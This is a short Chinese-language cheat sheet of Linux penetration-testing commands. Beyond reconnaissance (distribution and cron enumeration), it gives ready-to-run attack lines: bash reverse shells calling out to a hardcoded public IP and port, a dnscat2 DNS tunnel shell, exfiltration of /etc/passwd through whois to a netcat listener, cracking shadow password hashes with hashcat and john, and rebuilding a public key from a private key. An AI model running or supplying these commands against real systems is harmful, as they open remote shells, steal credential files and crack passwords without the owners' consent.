Linux渗透常用指令

linux信息收集

探测linux是什么发行版本

lsb_release -a
cat /etc/issue
cat /etc/*-release 
cat /etc/lsb-release 
# Debian based 
cat /etc/redhat-release

查询是否存在打印机

lpstat -a

查看计划任务

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Linux反弹shell

在线工具推荐：https://www.revshells.com/
反弹shell

bash -i >& /dev/tcp/49.234.81.168/1616 0>&1
0<&123-;exec 123<>/dev/tcp/49.234.81.168/1616;sh <&123 >&123 2>&123

dns反弹shell(使用dnscat2)

服务端(docker)

docker run -p 5353:5353/udp -it --rm mpercival/dnscat2 ruby ./dnscat2.rb --dns host=0.0.0.0,port=5353 --secret=123456

客户端（被控）

dnscat --dns server=169.1.1.8,port=5353,type=TXT --secret=123456

在服务端运行成功后会出现secret值，客户端填入对应值即可（当然服务端也可以提前指定）

使用教程：

sessions -i <id>
进入后：shell则启动反弹shell

利用whois传输文件

客户机

whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`

接收机

nc -l -v -p 4444 | sed "s/ //g" | base64 -d

HashCat破解shadow

hashcat -m 1800 -a 0 ./shadow.txt ./dictionary.txt

-m 1800 表示使用 SHA-512 加密算法
-a 0 表示使用字典攻击模式
./shadow.txt 是你复制的 shadow 文件路径
./dictionary.txt 是你准备的字典文件路径

john破解shadow

john --wordlist=dictionary.txt shadow.txt

ssh利用私钥生成公钥

ssh-keygen -y -f id_rsa > id_rsa.pub